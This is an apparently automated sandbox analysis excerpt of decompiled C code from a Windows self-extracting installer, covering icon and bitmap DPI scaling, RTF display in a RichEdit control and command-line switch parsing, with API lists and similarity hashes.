                                          0x00409050
                                          0x00409052
                                          0x00409052
                                          0x0040905b
                                          0x0040905c
                                          0x0040906b
                                          0x0040906d
                                          0x00409071
                                          0x00000000
                                          0x00000000
                                          0x00409063
                                          0x00409068
                                          0x0040906a
                                          0x0040906a
                                          0x0040907a
                                          0x00409082
                                          0x00409082
                                          0x00000000
                                          0x0040907a
                                          0x0040903f
                                          0x00408f7b
                                          0x00408f7c
                                          0x00408fa0
                                          0x00408faf
                                          0x00408fbc
                                          0x00408fc4
                                          0x00000000
                                          0x00408fc4
                                          0x00408f7f
                                          0x00000000
                                          0x00000000
                                          0x00408f87
                                          0x00408f95
                                          0x00408f9a
                                          0x00409006
                                          0x00409006
                                          0x00409014
                                          0x00000000
                                          0x00409014

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                          • LoadIconW.USER32(00000000), ref: 00408E84
                                          • GetSystemMetrics.USER32 ref: 00408E98
                                          • GetSystemMetrics.USER32 ref: 00408E9D
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                          • LoadImageW.USER32 ref: 00408EA9
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408530: GetDlgItem.USER32 ref: 00408541
                                            • Part of subcall function 00408530: GetWindowTextLengthW.USER32(00000000), ref: 00408544
                                            • Part of subcall function 00408530: GetDlgItem.USER32 ref: 00408559
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                          • GetDlgItem.USER32 ref: 00408EEF
                                          • GetDlgItem.USER32 ref: 00408EF9
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                          • SetWindowLongW.USER32 ref: 00408F14
                                          • GetDlgItem.USER32 ref: 00408F22
                                          • GetDlgItem.USER32 ref: 00408F30
                                          • GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                          • SetWindowLongW.USER32 ref: 00408F4B
                                          • GetDlgItem.USER32 ref: 00408F58
                                          • GetWindow.USER32(?,00000005), ref: 00409037
                                          • GetWindow.USER32(?,00000005), ref: 00409053
                                          • GetWindow.USER32(?,00000005), ref: 0040906B
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,00000000,?,?,?,?,?,00409247), ref: 004090CB
                                          • LoadIconW.USER32(00000000), ref: 004090D2
                                          • GetDlgItem.USER32 ref: 004090F1
                                          • SendMessageW.USER32(00000000), ref: 004090F4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ItemWindow$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                          • String ID:
                                          • API String ID: 4137352925-0
                                          • Opcode ID: 8ff0e453a25b7ed1698ed8cf16fcb10b98d2a5bb9c502bc786f19c9e8b0db9be
                                          • Instruction ID: 74a6605ae4d4b0bf7a0e7ecc706b23d5cc7c3d9f5b8aaf708246ebd2ef89c431
                                          • Opcode Fuzzy Hash: 8ff0e453a25b7ed1698ed8cf16fcb10b98d2a5bb9c502bc786f19c9e8b0db9be
                                          • Instruction Fuzzy Hash: 6871C7B07447057BEA216B219D46F2B3A99EB84744F10443EF651B62D3CFBDEC018A5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404BA4, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 115windowlibrarystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00404BA4(struct HWND__* __ecx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v28;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				char _v120;
				signed char _t30;
				struct HWND__* _t33;
				struct HMENU__* _t36;
				struct HWND__* _t53;
				struct HWND__* _t67;

				_t67 = __ecx;
				if(GetClassNameA(__ecx,  &_v120, 0x40) == 0 || lstrcmpiA( &_v120, "STATIC") != 0) {
					L5:
					return 0;
				} else {
					_t30 = GetWindowLongW(_t67, 0xfffffff0);
					_t71 = _t30 & 0x0000000e;
					if((_t30 & 0x0000000e) != 0) {
						goto L5;
					}
					E00404AF5( &_v28, _t67, _t71);
					if(E00403786(_v28, L"{\\rtf", 5) == 0) {
						_t33 = GetParent(_t67);
						_v8 = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							goto L4;
						}
						LoadLibraryA("riched20");
						E004038D4(_t67,  &_v56);
						_t36 = GetMenu(_t67);
						SetThreadLocale(0x419);
						_t53 = CreateWindowExW(0, L"RichEdit20W", 0x41da3c, 0x50000804, _v56, _v52, _v48 - _v56, _v44 - _v52, _v8, _t36, 0, 0);
						__eflags = _t53;
						if(__eflags == 0) {
							goto L4;
						}
						DestroyWindow(_t67);
						SendMessageW(_t53, 0x459, 0x22, 0);
						SendMessageW(_t53, 0x443, 0, GetSysColor(0xf));
						_v12 = 0xfde9;
						_v16 = 0;
						E0040438B( &_v40,  &_v28, __eflags, 0xfde9);
						SendMessageW(_t53, 0x461,  &_v16, _v40);
						_push(_v40);
						L0041C160();
						_push(_v28);
						L0041C160();
						return _t53;
					}
					L4:
					_push(_v28);
					L0041C160();
					goto L5;
				}
			}


















                                          0x00404bb2
                                          0x00404bbe
                                          0x00404c06
                                          0x00000000
                                          0x00404bd3
                                          0x00404bd6
                                          0x00404bdc
                                          0x00404bde
                                          0x00000000
                                          0x00000000
                                          0x00404be5
                                          0x00404bfb
                                          0x00404c0e
                                          0x00404c16
                                          0x00404c19
                                          0x00404c1b
                                          0x00000000
                                          0x00000000
                                          0x00404c22
                                          0x00404c2d
                                          0x00404c33
                                          0x00404c40
                                          0x00404c76
                                          0x00404c78
                                          0x00404c7a
                                          0x00000000
                                          0x00000000
                                          0x00404c7d
                                          0x00404c92
                                          0x00404ca4
                                          0x00404cb2
                                          0x00404cb5
                                          0x00404cb8
                                          0x00404cca
                                          0x00404ccc
                                          0x00404ccf
                                          0x00404cd4
                                          0x00404cd7
                                          0x00000000
                                          0x00404cde
                                          0x00404bfd
                                          0x00404bfd
                                          0x00404c00
                                          0x00000000
                                          0x00404c05

                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00404BB6
                                          • lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00404BC9
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BD6
                                            • Part of subcall function 00404AF5: GetWindowTextLengthW.USER32(?), ref: 00404B02
                                            • Part of subcall function 00404AF5: GetWindowTextW.USER32 ref: 00404B1C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404C00
                                          • GetParent.USER32 ref: 00404C0E
                                          • LoadLibraryA.KERNEL32(riched20,?,00000005,?,000000F0,?,?,00000040), ref: 00404C22
                                          • GetMenu.USER32 ref: 00404C33
                                          • SetThreadLocale.KERNEL32(00000419,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404C40
                                          • CreateWindowExW.USER32 ref: 00404C70
                                          • DestroyWindow.USER32(?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404C7D
                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00404C92
                                          • GetSysColor.USER32(0000000F), ref: 00404C96
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00404CA4
                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00404CCA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404CCF
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404CD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                          • API String ID: 3514532227-2281146334
                                          • Opcode ID: f61e8651b8c318852fd26f465c4723bf904f748a098d933736194205125b4bad
                                          • Instruction ID: 653fa6765fec41a2c767cdcafb0f0c5f7003fb3de14a91a34d01aabbe2365a95
                                          • Opcode Fuzzy Hash: f61e8651b8c318852fd26f465c4723bf904f748a098d933736194205125b4bad
                                          • Instruction Fuzzy Hash: BF3183F1E40119BBDB10ABA5DD49EEFBB7DEF44704F10807AF601B2191DA789A418B6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004039F1, Relevance: 31.6, APIs: 21, Instructions: 119windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E004039F1(void* __ecx) {
				struct HDC__* _v8;
				struct HDC__* _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				int _v44;
				int _v48;
				void _v52;
				struct HDC__* _t37;
				int _t38;
				int _t39;
				int _t62;
				struct HDC__* _t63;

				_v16 = __ecx;
				_t37 = GetWindowDC(0);
				_v8 = _t37;
				_t38 = GetDeviceCaps(_t37, 0x58);
				if(_t38 < 1) {
					_t38 = 0x60;
				}
				_t39 = MulDiv(_t38, 0x64, 0x60);
				if(_t39 < 0x76) {
					if(_t39 <= 0x91) {
						ReleaseDC(0, _v8);
						return CopyImage(_v16, 0, 0, 0, 0);
					}
					goto L6;
				} else {
					if(_t39 > 0x91) {
						L6:
						_push(3);
						_v12 = 2;
						L7:
						_pop(_t62);
						GetObjectW(_v16, 0x18,  &_v52);
						_v24 = MulDiv(_v48, _t62, _v12);
						_v20 = MulDiv(_v44, _t62, _v12);
						_v12 = CreateCompatibleDC(_v8);
						_t63 = CreateCompatibleDC(_v8);
						_v16 = SelectObject(_v12, _v16);
						_v28 = SelectObject(_t63, CreateCompatibleBitmap(_v8, _v24, _v20));
						SetStretchBltMode(_t63, 4);
						StretchBlt(_t63, 0, 0, _v24, _v20, _v12, 0, 0, _v48, _v44, 0xcc0020);
						_v24 = GetCurrentObject(_t63, 7);
						SelectObject(_v12, _v16);
						SelectObject(_t63, _v28);
						DeleteDC(_v12);
						DeleteDC(_t63);
						ReleaseDC(0, _v8);
						return _v24;
					}
					_push(4);
					_v12 = 3;
					goto L7;
				}
			}

















                                          0x004039fd
                                          0x00403a00
                                          0x00403a09
                                          0x00403a0c
                                          0x00403a15
                                          0x00403a19
                                          0x00403a19
                                          0x00403a25
                                          0x00403a2a
                                          0x00403a43
                                          0x00403b19
                                          0x00000000
                                          0x00403b26
                                          0x00000000
                                          0x00403a2c
                                          0x00403a31
                                          0x00403a49
                                          0x00403a49
                                          0x00403a4b
                                          0x00403a52
                                          0x00403a52
                                          0x00403a5c
                                          0x00403a6e
                                          0x00403a80
                                          0x00403a88
                                          0x00403a99
                                          0x00403aa0
                                          0x00403ab6
                                          0x00403ab9
                                          0x00403ad8
                                          0x00403aea
                                          0x00403af0
                                          0x00403af6
                                          0x00403b01
                                          0x00403b04
                                          0x00403b0a
                                          0x00000000
                                          0x00403b10
                                          0x00403a33
                                          0x00403a35
                                          0x00000000
                                          0x00403a35

                                          APIs
                                          • GetWindowDC.USER32(00000000), ref: 00403A00
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00403A0C
                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403A25
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00403A5C
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A69
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A75
                                          • CreateCompatibleDC.GDI32(?), ref: 00403A83
                                          • CreateCompatibleDC.GDI32(?), ref: 00403A8B
                                          • SelectObject.GDI32(00000002,?), ref: 00403A9B
                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403AA9
                                          • SelectObject.GDI32(00000000,00000000), ref: 00403AB1
                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00403AB9
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403AD8
                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00403AE1
                                          • SelectObject.GDI32(00000002,?), ref: 00403AF0
                                          • SelectObject.GDI32(00000000,?), ref: 00403AF6
                                          • DeleteDC.GDI32(00000002), ref: 00403B01
                                          • DeleteDC.GDI32(00000000), ref: 00403B04
                                          • ReleaseDC.USER32 ref: 00403B0A
                                          • ReleaseDC.USER32 ref: 00403B19
                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00403B26
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                          • String ID:
                                          • API String ID: 3462224810-0
                                          • Opcode ID: 612ab1c299c70adb56458b05f96c4172f6b033e0d16868d111d26e83d45414ef
                                          • Instruction ID: 64add8f3f0553c82617c9ad687e152a2c61f87497f12b8b4a2d195a12937468c
                                          • Opcode Fuzzy Hash: 612ab1c299c70adb56458b05f96c4172f6b033e0d16868d111d26e83d45414ef
                                          • Instruction Fuzzy Hash: 3941E0B6D00218BFDF119FE1DC48EAEBF79EB08765F108066F601B21A0C7758A51AF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004016FE, Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 273stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E004016FE(void* __eflags) {
				signed short* _v8;
				WCHAR* _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				void* _t65;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				WCHAR* _t92;
				WCHAR* _t95;
				WCHAR* _t96;
				WCHAR* _t97;
				signed int _t99;
				WCHAR* _t103;
				signed short* _t105;
				signed int _t106;
				signed int _t107;
				signed short* _t108;
				signed int _t143;
				signed int _t150;
				char _t151;
				WCHAR* _t164;
				WCHAR* _t167;

				_t167 =  *0x4227cc; // 0x9d2588
				E004147DF(_t65,  &_v24);
				_v8 = _t167;
				_v12 =  &(_t167[lstrlenW(_t167)]);
				_t69 =  *_t167 & 0x0000ffff;
				while(_t69 != 0) {
					__eflags = _t69 - 0x20;
					if(_t69 <= 0x20) {
						_t6 =  &_v8;
						 *_t6 =  &(_v8[1]);
						__eflags =  *_t6;
						_t69 =  *_v8 & 0x0000ffff;
						continue;
					}
					L6:
					while( *_t167 <= 0x20) {
						while(1) {
							_t70 =  *_t167 & 0x0000ffff;
							if(_t70 == 0) {
								break;
							}
							__eflags = _t70 - 0x20;
							if(_t70 <= 0x20) {
								_t167 =  &(_t167[1]);
								__eflags = _t167;
								continue;
							}
							break;
						}
						_t71 =  *_t167 & 0x0000ffff;
						if(_t71 == 0x2f || _t71 == 0x2d) {
							if(_t167[1] == 0x21) {
								_t164 = _t167;
								_t167 =  &(_t167[2]);
								__eflags = _t164;
								if(_t164 == 0) {
									goto L67;
								}
								goto L68;
							} else {
								_t10 =  &(_t167[1]); // 0x9d2588
								if(E00402FEC(_t10, L"ai") == 0) {
									_t12 =  &(_t167[1]); // 0x9d2588
									__eflags = E00402FEC(_t12, L"om");
									if(__eflags == 0) {
										_t14 =  &(_t167[1]); // 0x9d2588
										_t92 = E00402FEC(_t14, L"gm");
										__eflags = _t92;
										if(_t92 == 0) {
											_t17 =  &(_t167[1]); // 0x9d2588
											__eflags = E00402FEC(_t17, L"gf");
											if(__eflags == 0) {
												_t19 =  &(_t167[1]); // 0x9d2588
												__eflags = E00402FEC(_t19, L"mf");
												if(__eflags == 0) {
													_t21 =  &(_t167[1]); // 0x9d2588
													_t95 = E00402FEC(_t21, L"sd");
													__eflags = _t95;
													if(_t95 == 0) {
														_t24 =  &(_t167[1]); // 0x9d2588
														_t96 = E00402FEC(_t24, L"nr");
														__eflags = _t96;
														if(_t96 == 0) {
															_t26 =  &(_t167[1]); // 0x9d2588
															_t97 = E00402FEC(_t26, L"fm");
															__eflags = _t97;
															if(_t97 == 0) {
																_t28 =  &(_t167[1]); // 0x9d2588
																__eflags = E00402FEC(_t28, L"bpt");
																if(__eflags == 0) {
																	_t99 = _t167[1] & 0x0000ffff;
																	__eflags = _t99 - 0x70;
																	if(_t99 == 0x70) {
																		L65:
																		E004147DF(_t99,  &_v36);
																		_t35 =  &(_t167[2]); // 0x9d258a
																		_t38 = E00403022(_t35,  &_v36) - 2; // -2
																		_t167 = _t38;
																		E00414864(0x422708, _v36);
																		_push(_v36);
																		 *0x422700 = 1;
																		L0041C160();
																		continue;
																	} else {
																		__eflags = _t99 - 0x50;
																		if(_t99 == 0x50) {
																			goto L65;
																		} else {
																			__eflags = _t99 - 0x79;
																			if(_t99 == 0x79) {
																				L55:
																				__eflags = _t167[2] - 0x20;
																				if(_t167[2] > 0x20) {
																					goto L57;
																				} else {
																					 *0x4227c9 = 1;
																					continue;
																				}
																			} else {
																				__eflags = _t99 - 0x59;
																				if(_t99 != 0x59) {
																					L57:
																					__eflags = _t99 - 0x3f;
																					if(_t99 == 0x3f) {
																						L60:
																						__eflags = _t167[2] - 0x20;
																						if(_t167[2] > 0x20) {
																							goto L62;
																						} else {
																							 *0x4227cb = 1;
																							continue;
																						}
																					} else {
																						__eflags = _t99 - 0x68;
																						if(_t99 == 0x68) {
																							goto L60;
																						} else {
																							__eflags = _t99 - 0x48;
																							if(_t99 != 0x48) {
																								L62:
																								_t33 =  &(_t167[1]); // 0x9d2588
																								_t103 = E004015B3(_t33);
																								__eflags = _t103;
																								if(_t103 == 0) {
																									goto L67;
																								} else {
																									__eflags = _t103 - 1;
																									if(_t103 == 1) {
																										_t167 = 0;
																										__eflags = 0;
																									} else {
																										_t167 = _t103;
																										continue;
																									}
																								}
																							} else {
																								goto L60;
																							}
																						}
																					}
																				} else {
																					goto L55;
																				}
																			}
																		}
																	}
																} else {
																	_t29 =  &(_t167[4]); // 0x9d258e
																	_t163 = _t29;
																	goto L50;
																}
															} else {
																_t27 =  &(_t167[3]); // 0x9d258c
																_t105 = _t27;
																_t143 =  *_t105 & 0x0000ffff;
																__eflags = _t143 - 0x30;
																if(_t143 < 0x30) {
																	goto L67;
																} else {
																	__eflags = _t143 - 0x39;
																	if(_t143 > 0x39) {
																		goto L67;
																	} else {
																		__imp___wtol(_t105);
																		 *0x422468 = _t105;
																		continue;
																	}
																}
															}
														} else {
															__eflags = _t167[3] - 0x20;
															if(_t167[3] > 0x20) {
																goto L67;
															} else {
																 *0x4227ca = 1;
																continue;
															}
														}
													} else {
														_t22 =  &(_t167[3]); // 0x9d258c
														_t163 = _t22;
														_t106 =  *_t22 & 0x0000ffff;
														__eflags = _t106 - 0x30;
														if(_t106 == 0x30) {
															L39:
															__eflags = _t167[4] - 0x20;
															if(__eflags > 0) {
																goto L67;
															} else {
																goto L50;
															}
														} else {
															__eflags = _t106 - 0x31;
															if(_t106 != 0x31) {
																goto L67;
															} else {
																goto L39;
															}
														}
													}
												} else {
													_t20 =  &(_t167[3]); // 0x9d258c
													_t163 = _t20;
													goto L50;
												}
											} else {
												_t18 =  &(_t167[3]); // 0x9d258c
												_t163 = _t18;
												goto L50;
											}
										} else {
											_t15 =  &(_t167[3]); // 0x9d258c
											_t163 = _t15;
											_t107 =  *_t15 & 0x0000ffff;
											__eflags = _t107 - 0x30;
											if(_t107 < 0x30) {
												goto L67;
											} else {
												__eflags = _t107 - 0x32;
												if(_t107 > 0x32) {
													goto L67;
												} else {
													__eflags = _t167[4] - 0x20;
													if(__eflags > 0) {
														goto L67;
													} else {
														goto L50;
													}
												}
											}
										}
									} else {
										_t13 =  &(_t167[3]); // 0x9d258c
										_t163 = _t13;
										L50:
										E004016A8(_t163, __eflags);
										continue;
									}
								} else {
									_t11 =  &(_t167[3]); // 0x9d258c
									_t108 = _t11;
									_t150 =  *_t108 & 0x0000ffff;
									if(_t150 < 0x30 || _t150 > 0x39) {
										if(_t150 < 0x61 || _t150 > 0x7a) {
											if(_t150 < 0x41 || _t150 > 0x5a) {
												__eflags = _t150 - 0x20;
												if(_t150 > 0x20) {
													goto L67;
												} else {
													 *0x4227c4 = 0x41d648;
													goto L22;
												}
											} else {
												goto L21;
											}
										} else {
											goto L21;
										}
									} else {
										L21:
										 *0x4227c4 = _t108;
										L22:
										 *0x4227c8 = 0x101;
										continue;
									}
								}
							}
						} else {
							L67:
							_t164 = _t167;
							L68:
							__eflags = _v8 - _t164;
							if(__eflags == 0) {
								_t151 = 0x41da3c;
							} else {
								E00414803( &_v60, _v8);
								E004146A6( &_v48, _t164 - _v8 >> 1,  &_v60);
								E00414864( &_v24, _v48);
								_push(_v48);
								L0041C160();
								_push(_v60);
								L0041C160();
								E00414ADC( &_v24);
								E00414AA5( &_v24);
								_t151 = _v24;
							}
							E00404F69(L"SfxVarCmdLine1", _t151, __eflags, 1);
							E00414803( &_v48, _t167);
							E004146A6( &_v60, _v12 - _t167 >> 1,  &_v48);
							E00414864( &_v24, _v60);
							_push(_v60);
							L0041C160();
							_push(_v48);
							L0041C160();
							E00414ADC( &_v24);
							E00414AA5( &_v24);
							E00404F69(L"SfxVarCmdLine2", _v24, __eflags, 1);
						}
						_push(_v24);
						L0041C160();
						return _t167;
					}
					_t167 =  &(_t167[1]);
					__eflags = _t167;
					goto L6;
				}
				goto L6;
			}




























                                          0x00401705
                                          0x0040170f
                                          0x00401715
                                          0x00401721
                                          0x00401724
                                          0x00401739
                                          0x00401729
                                          0x0040172d
                                          0x0040172f
                                          0x0040172f
                                          0x0040172f
                                          0x00401736
                                          0x00000000
                                          0x00401736
                                          0x00000000
                                          0x00401743
                                          0x00401754
                                          0x00401754
                                          0x0040175a
                                          0x00000000
                                          0x00000000
                                          0x0040174b
                                          0x0040174f
                                          0x00401751
                                          0x00401751
                                          0x00000000
                                          0x00401751
                                          0x00000000
                                          0x0040174f
                                          0x0040175c
                                          0x00401762
                                          0x00401772
                                          0x004019c8
                                          0x004019ca
                                          0x004019cd
                                          0x004019cf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401778
                                          0x0040177d
                                          0x00401787
                                          0x004017d7
                                          0x004017df
                                          0x004017e1
                                          0x004017f5
                                          0x004017f8
                                          0x004017fd
                                          0x004017ff
                                          0x00401833
                                          0x0040183b
                                          0x0040183d
                                          0x00401851
                                          0x00401859
                                          0x0040185b
                                          0x0040186f
                                          0x00401872
                                          0x00401877
                                          0x00401879
                                          0x004018a6
                                          0x004018a9
                                          0x004018ae
                                          0x004018b0
                                          0x004018ce
                                          0x004018d1
                                          0x004018d6
                                          0x004018d8
                                          0x00401909
                                          0x00401911
                                          0x00401913
                                          0x00401927
                                          0x0040192b
                                          0x0040192e
                                          0x00401990
                                          0x00401993
                                          0x00401998
                                          0x004019ab
                                          0x004019ab
                                          0x004019ae
                                          0x004019b3
                                          0x004019b6
                                          0x004019bd
                                          0x00000000
                                          0x00401930
                                          0x00401930
                                          0x00401933
                                          0x00000000
                                          0x00401935
                                          0x00401935
                                          0x00401938
                                          0x0040193f
                                          0x0040193f
                                          0x00401944
                                          0x00000000
                                          0x00401946
                                          0x00401946
                                          0x00000000
                                          0x00401946
                                          0x0040193a
                                          0x0040193a
                                          0x0040193d
                                          0x00401952
                                          0x00401952
                                          0x00401955
                                          0x00401961
                                          0x00401961
                                          0x00401966
                                          0x00000000
                                          0x00401968
                                          0x00401968
                                          0x00000000
                                          0x00401968
                                          0x00401957
                                          0x00401957
                                          0x0040195a
                                          0x00000000
                                          0x0040195c
                                          0x0040195c
                                          0x0040195f
                                          0x00401974
                                          0x00401974
                                          0x00401977
                                          0x0040197c
                                          0x0040197e
                                          0x00000000
                                          0x00401980
                                          0x00401980
                                          0x00401983
                                          0x00401a27
                                          0x00401a27
                                          0x00401989
                                          0x00401989
                                          0x00000000
                                          0x00401989
                                          0x00401983
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040195f
                                          0x0040195a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040193d
                                          0x00401938
                                          0x00401933
                                          0x00401915
                                          0x00401915
                                          0x00401915
                                          0x00000000
                                          0x00401918
                                          0x004018da
                                          0x004018da
                                          0x004018da
                                          0x004018dd
                                          0x004018e0
                                          0x004018e3
                                          0x00000000
                                          0x004018e9
                                          0x004018e9
                                          0x004018ec
                                          0x00000000
                                          0x004018f2
                                          0x004018f3
                                          0x004018fa
                                          0x00000000
                                          0x004018fa
                                          0x004018ec
                                          0x004018e3
                                          0x004018b2
                                          0x004018b2
                                          0x004018b7
                                          0x00000000
                                          0x004018bd
                                          0x004018bd
                                          0x00000000
                                          0x004018bd
                                          0x004018b7
                                          0x0040187b
                                          0x0040187b
                                          0x0040187b
                                          0x0040187e
                                          0x00401881
                                          0x00401884
                                          0x0040188f
                                          0x0040188f
                                          0x00401894
                                          0x00000000
                                          0x0040189a
                                          0x00000000
                                          0x0040189a
                                          0x00401886
                                          0x00401886
                                          0x00401889
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401889
                                          0x00401884
                                          0x0040185d
                                          0x0040185d
                                          0x0040185d
                                          0x00000000
                                          0x00401860
                                          0x0040183f
                                          0x0040183f
                                          0x0040183f
                                          0x00000000
                                          0x00401842
                                          0x00401801
                                          0x00401801
                                          0x00401801
                                          0x00401804
                                          0x00401807
                                          0x0040180a
                                          0x00000000
                                          0x00401810
                                          0x00401810
                                          0x00401813
                                          0x00000000
                                          0x00401819
                                          0x00401819
                                          0x0040181e
                                          0x00000000
                                          0x00401824
                                          0x00000000
                                          0x00401824
                                          0x0040181e
                                          0x00401813
                                          0x0040180a
                                          0x004017e3
                                          0x004017e3
                                          0x004017e3
                                          0x0040191d
                                          0x0040191d
                                          0x00000000
                                          0x0040191d
                                          0x00401789
                                          0x00401789
                                          0x00401789
                                          0x0040178c
                                          0x00401792
                                          0x0040179c
                                          0x004017a6
                                          0x004017bd
                                          0x004017c0
                                          0x00000000
                                          0x004017c6
                                          0x004017c6
                                          0x00000000
                                          0x004017c6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004017ad
                                          0x004017ad
                                          0x004017ad
                                          0x004017b2
                                          0x004017b2
                                          0x00000000
                                          0x004017b2
                                          0x00401792
                                          0x00401787
                                          0x004019d1
                                          0x004019d1
                                          0x004019d1
                                          0x004019d3
                                          0x004019d3
                                          0x004019d6
                                          0x00401a38
                                          0x004019d8
                                          0x004019de
                                          0x004019f0
                                          0x004019fb
                                          0x00401a00
                                          0x00401a03
                                          0x00401a08
                                          0x00401a0b
                                          0x00401a15
                                          0x00401a1d
                                          0x00401a22
                                          0x00401a22
                                          0x00401a44
                                          0x00401a4d
                                          0x00401a61
                                          0x00401a6c
                                          0x00401a71
                                          0x00401a74
                                          0x00401a79
                                          0x00401a7c
                                          0x00401a86
                                          0x00401a8e
                                          0x00401a9d
                                          0x00401a9d
                                          0x00401a29
                                          0x00401a2c
                                          0x00401a37
                                          0x00401a37
                                          0x00401740
                                          0x00401740
                                          0x00000000
                                          0x00401740
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • lstrlenW.KERNEL32(009D2588,?,00422148,?,?,?,?,?,?,?,?,?,?,?,004065BE,?), ref: 00401718
                                            • Part of subcall function 00402FEC: lstrlenW.KERNEL32(0041DA80,?,009D2586,?,004227B8,00401785), ref: 00402FFB
                                            • Part of subcall function 00402FEC: lstrlenW.KERNEL32(009D2588,?,004227B8,00401785,?,?,?,?,?,?,?,?,?,?,?,004065BE), ref: 00403000
                                            • Part of subcall function 00402FEC: _wcsnicmp.MSVCRT ref: 00403009
                                          • _wtol.MSVCRT(009D258C,?,?,?,?,?,?,?,?,?,?,?,004065BE,?,00000000), ref: 004018F3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004019BD
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401A03
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401A2C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401A0B
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD0
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD9
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FE1
